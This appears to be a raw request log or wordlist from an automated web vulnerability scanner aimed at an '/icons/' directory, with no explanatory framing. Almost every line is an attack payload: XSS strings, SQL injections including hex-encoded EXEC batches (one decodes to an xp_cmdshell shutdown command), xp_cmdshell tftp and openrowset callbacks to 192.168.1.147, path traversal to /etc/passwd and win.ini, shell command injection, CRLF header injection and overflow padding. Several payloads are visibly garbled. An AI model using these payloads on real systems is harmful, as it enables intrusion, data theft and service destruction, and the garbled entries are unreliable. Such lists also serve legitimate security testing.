AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/.DS_Store
/icons/.FBCIndex
/icons/.forward
/icons/.htaccess
/icons/.htaccess.old
/icons/.htpasswd
/icons/.passwd
/icons/.README
/icons/.README.html
/icons/.small
/icons//%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons//%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons//?>'"><script>alert(xss)</script>
/icons//NoneExistent%0d%0aInjectedHeadernjectedValue
/icons//Sites/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/icons//Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/icons//Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/icons//Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/icons//Sites/Samples/Knowledge/Push/ViewCode.asp?file=index.asp
/icons//Sites/Samples/Knowledge/Search/ViewCode.asp?file=index.asp
/icons//siteserver/publishing/viewcode.asp?file=index.asp
/icons//th1s1sanonexistantf1l3.1224703657
/icons/1163666388
/icons/123%0a%0a%3ealert(xss)%3b%3c/script%3e123.jsp
/icons/175436043.html
/icons/421827619.old
/icons/643101395/
/icons/<oot.ini
/icons/>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/icons/?>'"><script>alert(xss)</script>
/icons/?C=
/icons/?C="
/icons/?C="'><A%20HREF="/WF_XSRF.html">Injected%20Link</A>
/icons/?C="'><IMG%20SRC="/WF_XSRF.html">
/icons/?C="></IFRAME><script>alert(xss)</script>
/icons/?C="></style><script>alert(xss)</script>
/icons/?C="></STYLE><STYLE>@import"javascriptt(xss)";</STYLE>
/icons/?C="></title><script>alert(xss)</script>
/icons/?C=%00
/icons/?C=%20onMouseOver=alert(xss)>
/icons/?C=%22%20%7C%20%22id
/icons/?C=%22%20%7C%20%22vol
/icons/?C=%22%20onMouseOver=alert(xss)>
/icons/?C=%22%20style%3D%22backgroundession(alert(xss))%22%20OA%3D%22
/icons/?C=%22%27
/icons/?C=%26%26id
/icons/?C=%26%26vol
/icons/?C=%27%20%7C%20%27id
/icons/?C=%27%20%7C%20%27vol
/icons/?C=%27%22%3E%3Cscript%3Ealert(xss)%3C%2Fscript%3E
/icons/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/?C=%7C%7Cid
/icons/?C=%7C%7Cvol
/icons/?C=%7Cid
/icons/?C=%7Cvol
/icons/?C=%A7%A2%BE%BC%F3%E3%F2%E9%F0%F4%BE%E1%EC%E5%F2%F4%A834061%A9%BC%AF%F3%E3%F2%E9%F0%F4%BE
/icons/?C='
/icons/?C='"><iframe%20src=javascriptt(xss)>
/icons/?C='%20+%20''%20+%20'N;O=D
/icons/?C='%20onMouseOver=alert(xss)>
/icons/?C='%20||%20'N;O=D
/icons/?C=)
/icons/?C=--><script>alert(xss)</script>
/icons/?C=../../../../../../bin/id|
/icons/?C=../../../../../../usr/bin/id|
/icons/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
/icons/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/icons/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/icons/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini
/icons/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/icons/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/icons/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/icons/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini
/icons/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/icons/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/icons/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini
/icons/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../boot.ini
/icons/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/icons/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/win.ini
/icons/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/icons/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini
/icons/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/icons/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../boot.ini
/icons/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/icons/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/win.ini
/icons/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../boot.ini
/icons/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/icons/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/win.ini
/icons/?C=/../../../../../../../../boot.ini
/icons/?C=/../../../../../../../../etc/passwd
/icons/?C=/../../../../../../../../windows/win.ini
/icons/?C=/../../../../../../../../winnt/win.ini
/icons/?C=;
/icons/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/?C=;vol|
/icons/?C=</TextArea><script>alert(xss)</script>
/icons/?C=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(xss)>
/icons/?C=>"><%00script>alert(xss)</script>
/icons/?C=>"><script>alert(xss)</script>
/icons/?C=>%22%27><img%20src%3d%22javascriptt(xss)%22>
/icons/?C=>'><%00script>alert(xss)</script>
/icons/?C=>'><script>alert(xss)</script>
/icons/?C=>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/icons/?C=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/?C=AVAK$(RETURN_CODE)OS
/icons/?C=Cdows\win.ini
/icons/?C=Cnt\win.ini
/icons/?C=Ct.ini
/icons/?C=D;O=A
/icons/?C=id|
/icons/?C=M;O=A
/icons/?C=N;O=D
/icons/?C=N;O=D"+alert(xss)+"
/icons/?C=N;O=D#&<(,+">;
/icons/?C=N;O=D%22%2Balert%2834053%29%2B%22
/icons/?C=N;O=D%27%2Balert%2834049%29%2B%27
/icons/?C=N;O=D%2Balert%2834057%29%2B
/icons/?C=N;O=D%a5'%20having%201=1--
/icons/?C=N;O=D%uFF07
/icons/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2833949%29%3C%2Fscript%3E=123
/icons/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2833953%29%3C%2Fscript%3E=123
/icons/?C=N;O=D'
/icons/?C=N;O=D'"WFXSSProbe)/>
/icons/?C=N;O=D'%20+%20'somechars
/icons/?C=N;O=D'%20and%20'barfoo'='foobar
/icons/?C=N;O=D'%20and%20'barfoo'='foobar'%20--
/icons/?C=N;O=D'%20and%20'barfoo'='foobar')%20--
/icons/?C=N;O=D'%20and%20'foobar'='foobar
/icons/?C=N;O=D'%20and%20'foobar'='foobar'%20--
/icons/?C=N;O=D'%20and%20'foobar'='foobar')%20--
/icons/?C=N;O=D'%20exec%20master..xp_cmdshell%20'vol'--
/icons/?C=N;O=D'%20having%201=1--
/icons/?C=N;O=D'%20or%20'foobar'='foobar
/icons/?C=N;O=D'%20or%20'foobar'='foobar'%20--
/icons/?C=N;O=D'%20or%20'foobar'='foobar')%20--
/icons/?C=N;O=D'%20||%20'somechars
/icons/?C=N;O=D'%20||%20UTL_HTTP.REQUEST('http2.168.1.147QL_Injection_Validation')%20||%20'
/icons/?C=N;O=D'+alert(xss)+'
/icons/?C=N;O=D';
/icons/?C=N;O=D';%20exec%20master..xp_cmdshell%20'tftp%20192.168.1.147%20GET%20SQL_Injection_Validation'--
/icons/?C=N;O=D';%20select%20*%20from%20dbo.sysdatabases--
/icons/?C=N;O=D';%20select%20*%20from%20master..sysmessages--
/icons/?C=N;O=D';%20select%20*%20from%20openrowset('sqloledb','Network=DBMSSOCN;Address=192.168.1.147,9999;uid=myUsr;pwd=myPass;timeout=5','select%20foo%20from%20bar')--
/icons/?C=N;O=D';%20select%20*%20from%20sys.dba_users--
/icons/?C=N;O=D';%20select%20@@version,1,1,1--
/icons/?C=N;O=D)%20having%201=1--
/icons/?C=N;O=D*/--></script><script>alert(xss)</script>
/icons/?C=N;O=D+alert(xss)+
/icons/?C=N;O=D1%20having%201=1--
/icons/?C=N;O=DWFXSSProbe
/icons/?C=N;O=D\'%20having%201=1--
/icons/?C=S;O=A
/icons/?C=somechars'%20+%20'N;O=D
/icons/?C=somechars'%20||%20'N;O=D
/icons/?C=WF'SQL"Probe;A--B
/icons/?C=\"
/icons/?C=\'
/icons/?C=\..\..\..\..\..\..\..\..\boot.ini
/icons/?C=\..\..\..\..\..\..\..\..\windows\win.ini
/icons/?C=\..\..\..\..\..\..\..\..\winnt\win.ini
/icons/?C=\u003Cscript\u003Ealert\u002834031\u0029\u003C/script\u003E
/icons/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini
/icons/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/icons/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/icons/?M=A
/icons/?S=D
/icons/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA